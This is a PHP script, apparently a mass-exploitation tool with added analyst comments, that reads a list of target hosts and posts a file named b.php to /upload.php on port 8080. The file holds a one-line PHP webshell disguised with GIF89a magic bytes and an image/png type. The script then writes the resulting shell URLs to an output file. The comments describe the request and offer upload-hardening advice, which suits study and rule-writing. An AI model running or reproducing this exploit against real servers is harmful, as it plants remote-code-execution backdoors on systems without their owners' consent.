<?php
// Usage guard: the script expects two command-line arguments, a file of
// target URLs ($argv[1]) and an output file ($argv[2]). With fewer than
// that it prints a usage line and exits before doing any network I/O.
if(count($argv)<3){ print "\r\n\tUse Examply: ".$argv[0]." url.txt save.txt\r\n"; exit; }
/**
 * Send a pre-built raw HTTP request to $host on TCP port 8080 and read the reply.
 *
 * The port is hard-coded and fsockopen() is called without a timeout argument.
 * If the first connect fails, a message is printed and exactly one more
 * connect is attempted; the result of that second attempt is not checked
 * before fwrite() is called on it.
 *
 * @param string $host   Host to connect to, as passed straight to fsockopen().
 * @param string $packet Complete request bytes (request line, headers, body).
 * @return string The value of the last fread() call made before EOF; each
 *                read overwrites $resp rather than appending to it.
 */
function http_send($host, $packet){
$sock = fsockopen($host, 8080);
// One retry on connect failure, then write the request and read 1024-byte chunks until EOF.
if(!$sock){ print "\n[-] No response from {$host}:8080 Trying again..."; $sock = fsockopen($host, 8080); } fwrite($sock, $packet); while (!feof($sock)) { $resp=fread($sock,1024); } fclose($sock); return $resp;
}
/**
 * Build the raw HTTP request that http_send() transmits: a multipart/form-data
 * POST to /upload.php carrying one form field named "file".
 *
 * What the request contains, for analysts and rule writers:
 *  - The part declares Content-Type image/png and its body starts with the
 *    "GIF89a" magic bytes, but the next line is a PHP open tag followed by
 *    eval() of a request parameter, i.e. a one-line webshell. The declared
 *    type, the magic bytes and the file extension disagree with each other.
 *  - The filename is whatever the caller passes in $filename.
 *  - The multipart boundary is the fixed string
 *    ----WebKitFormBoundaryF1mJrJElc0yUu1HA, and the only headers sent are
 *    Host, Content-Type, Content-Length and Connection (no User-Agent).
 *
 * Defensive takeaway: the client-supplied MIME type and leading magic bytes
 * are attacker-controlled and say nothing about the real content. An upload
 * handler should allow-list extensions, assign its own stored filename, and
 * keep uploads in a location the web server will not execute as PHP.
 *
 * Note: $payload is appended to with .= without being initialised first.
 *
 * @param string $host     Host name placed in the Host header (":8080" is appended).
 * @param string $filename Value used for the filename attribute of the upload part.
 * @return string The full request: headers, blank line, multipart body.
 */
function data($host,$filename){
$payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n"; $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"{$filename}\"\r\n"; $payload .= "Content-Type: image/png\r\n\r\n"; $payload .= 'GIF89a'."\r\n".'<?php eval($_REQUEST[shell])?>'."\r\n\r\n"; $payload .= "------WebKitFormBoundaryF1mJrJElc0yUu1HA--\r\n"; $packet = "POST /upload.php HTTP/1.1\r\n"; $packet .= "Host: {$host}:8080\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF1mJrJElc0yUu1HA\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload;
return $packet; }
/**
 * Run one upload attempt against $host and pull the "msg" field(s) out of the reply.
 *
 * Builds the request with data() using the fixed upload name "b.php", sends
 * it with http_send(), then applies a regex that matches msg":"..." in the
 * response text. No HTTP status check is made on the reply.
 *
 * NOTE(review): the caller turns the first match into a URL path, so "msg"
 * presumably carries the stored file location returned by the upload
 * endpoint; the response format is not shown here, so confirm.
 *
 * @param string $host Target host without scheme or port.
 * @return array The full-match strings from preg_match_all() (index 0 of
 *               $match); empty when the response has no msg field.
 */
function exploit($host){ $filename = "b.php"; $hosts = "{$host}"; $packet=data($hosts,$filename); $html=http_send($hosts,$packet); preg_match_all('/msg\":\"(.*?)\"/',$html,$match); return $match[0]; }
/**
 * Append one line to a results file.
 *
 * Opens $fileName in "a+" mode and writes $data followed by CRLF. The
 * fopen() result is not checked and the handle is never explicitly closed.
 *
 * @param string $fileName Path of the file to append to.
 * @param string $data     Text to write as one line.
 */
function w($fileName,$data){ fwrite(fopen($fileName,"a+"),$data."\r\n"); }
// Driver: read the target list named by the first CLI argument, one entry per line.
$url_txt = $argv[1];
$myurl = file($url_txt);
// Second CLI argument is the file that result lines are appended to.
$save_file = $argv[2];
// For each entry: keep the text after "//", strip every "/" and surrounding
// whitespace to get a bare host, run exploit() against it, then build
// "http://<host>:8080/<msg value>" from the first regex match (the text two
// characters past the first ":" with double quotes removed).
// The line is echoed and written to the save file whether or not a match was
// returned, so an entry in that file does not by itself show that the upload
// succeeded. Hosts are processed sequentially with a one-second pause.
foreach ($myurl as $value) { $v=substr($value,strpos($value,"//")+2); $v=trim(str_replace("/", "", $v)); $html=exploit($v); $result = "http://{$v}:8080/".trim(str_replace("\"","",substr($html[0],strpos($html[0],":")+2))); echo "\r\n".$result; w($save_file,$result); sleep(1); }
// The closing banner is printed unconditionally once the loop ends.
print "\r\n\r\n[+]-----------------------------WIN--------------------\r\n\r\n"; print "Save complete in {$save_file}\r\n\r\n";
?>